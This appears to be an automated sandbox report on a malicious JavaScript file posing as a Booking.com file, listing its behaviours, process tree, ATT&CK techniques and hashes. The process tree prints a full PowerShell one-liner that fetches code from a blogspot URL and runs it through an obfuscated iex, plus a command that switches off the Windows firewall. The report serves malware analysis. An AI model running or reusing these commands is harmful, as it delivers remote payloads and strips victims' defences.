Analysis
-
max time kernel
145s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
-
submitted
06/01/2024, 12:48
General
-
Target
Booking.com-1728394029.js
-
Size
116KB
-
MD5
21d0aeadf942a9c42a0f48143af18bba
-
SHA1
a1c7b79e09df8713c22c4b8f228af4869502719a
-
SHA256
3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b
-
SHA512
1e5472589584b31f533e8d021aeab5ddb5eeb23ebf278e736fd4a0cb5957f86c557c0648fa6aab508e162b87946368480501022139ea2175ccf46e1cc21258c3
-
SSDEEP
96:/umTnP/I5Vrquo0wwyEJmnU6HAVkEyle+YQdgv5M:2InHO8uo0ww7mU6HAVkEyle+YQdgv5M
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies registry class 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Booking.com-1728394029.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 52⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgteaxsh\xgteaxsh.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE791.tmp" "c:\Users\Admin\AppData\Local\Temp\xgteaxsh\CSCD5416904B223401B86435C28936AED3.TMP"4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7844⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7564⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
652B
MD5333687cbddf62f827402dcd3efce7ec9
SHA1171f4293a8cf85da0a9bf19b9628e726f35d97c1
SHA256bcf7f6fcbedce672ddce933e72c79f8968a56e818bbfb50c32246d4dee10f7e5
SHA51243896586e5b23cd551c63f81f265158353e41650730a834e1ecdd77c323888d238102d8edea17ab6158da29139f49ad6e0a8302898991bbe57b02ae9d93f7565
-
Filesize
369B
MD5de2471bead5c144d398c616dd98f85b1
SHA18dfc4cc41abced377921d6ff3919153fc7aeb660
SHA2562e018160426cf4e714a094254f60b26002559a9b32b8d98e349a54f91e22b112
SHA512729e92f518856a21a5f129a7e5d6bd01d1b2c115e548b7b493c6c948180ee0739088d2469903eb65be3d0ec05c2fe62b8afcb5bb58f9f8cac7f99e6b0eb1bc89
-
Filesize
64KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
7.7MB
-
Filesize
624KB
-
Filesize
792KB
-
Filesize
320KB
-
Filesize
40KB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
5.6MB
-
Filesize
792KB
-
Filesize
7.7MB
-
Filesize
5.7MB
-
Filesize
64KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
56KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
1.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB